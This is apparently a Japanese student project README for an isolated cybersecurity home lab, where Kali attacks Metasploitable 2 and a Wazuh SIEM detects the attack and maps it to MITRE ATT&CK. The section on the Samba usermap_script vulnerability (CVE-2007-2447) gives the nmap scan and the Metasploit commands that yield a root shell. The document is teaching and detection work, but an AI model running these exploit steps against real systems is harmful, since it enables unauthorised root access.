
隔離されたAD/Linux攻撃ラボ: Metasploit経由でCVE-2007-2447を悪用し、MITRE ATT&CK (T1190, T1059) にマッピングされたWazuh SIEMで検出
B.Tech プロジェクト (BTP) | IIIT Pune 基盤: 「Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring」 — ICCCNT 2023, IIT Delhi
無料・オープンソースツールのみを使用して単一マシン上に構築した、完全動作するサイバーセキュリティホームラボ。このラボは、偵察 → 悪用 → 検知という実世界の攻撃ライフサイクルをシミュレートし、SIEMが攻撃をリアルタイムで検知してMITRE ATT&CKフレームワークにマッピングする方法を実演します。
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| VM | 役割 | IP | ツール |
|---|---|---|---|
| Kali Linux 2026.1 | 攻撃者 | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | 被害者 | 10.0.0.2 | 20以上の脆弱性 |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
VirtualBoxで cyberlab という名前の内部ネットワークを作成します。3台すべてのVMにこのアダプターを割り当てます。Ubuntu/Wazuh VMには、ブラウザからダッシュボードにアクセスできるように、追加のホストオンリーアダプターを割り当てます。
cyberlab 内部ネットワークアダプターを割り当てる# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab ネットワークを割り当てる# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Metasploitable 2をインターネットに公開しないでください。 意図的に安全でない構成になっています。
cyberlab 内部 + ホストオンリー/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103(ホストのブラウザから)Metasploitable 2はWazuhエージェントを実行できないため、エージェントレス監視用にsyslog転送を構成します:
Metasploitableで、/etc/rsyslog.conf に追記:
*.* @10.0.0.3:514
Wazuh(Ubuntu)で、/var/ossec/etc/ossec.conf のsyslog入力を有効化:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Wazuhを再起動: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Metasploitable 2で発見された主要サービス:
20以上のオープンポートを発見。OSフィンガープリント: Linux 2.6.x
脆弱性: CVE-2007-2447 — Samba usermap_script コマンドインジェクション
Samba 3.0.0–3.0.25rc3 において、不正なMS-RPCリクエストを介して認証なしのリモートコード実行を可能にします。
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
エクスプロイト後、Wazuhは自動的にイベントを検知し、MITRE ATT&CK にマッピングしました:
検知されたイベント総数: 55以上
ダッシュボード https://192.168.56.103 → Security Events → MITRE ATT&CK にアクセス
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
このラボは完全に隔離された仮想マシン上に構築されており、攻撃シミュレーション中はインターネットアクセスはありません。すべてのツールと技術は、管理された環境内での教育目的にのみ厳密に使用されます。所有していないシステム、またはテストする明示的な許可を得ていないシステムに対して、攻撃技術を再現しようとしないでください。
Harshita Verma 発表 | IIIT Pune
| ツール | バージョン | 用途 |
|---|
| VirtualBox | 7.x | ハイパーバイザー — すべてのVMを1台のホスト上で実行 |
| Kali Linux | 2026.1 | ペネトレーションテスト用OS(攻撃側) |
| Metasploitable 2 | v2.0 | 意図的に脆弱なターゲット |
| Wazuh | v4.7.5 | オープンソースSIEM(防御側) |
| Nmap | 最新 | ネットワーク/ポートスキャン |
| Metasploit Framework | 最新 | エクスプロイトフレームワーク |
| ポート | サービス | バージョン |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| ルールID | 説明 | MITREテクニック | 戦術 |
|---|
| 5402 | rootへのsudo成功 | T1548.003 | 権限昇格 |
| 5501 | PAM: ログインセッション開始 | T1078 | 初期アクセス / 永続化 |
| 5502 | PAM: ログインセッション終了 | T1078 | 防御回避 |
| 502 | Wazuhサーバー起動 | — | 検知アクティブ |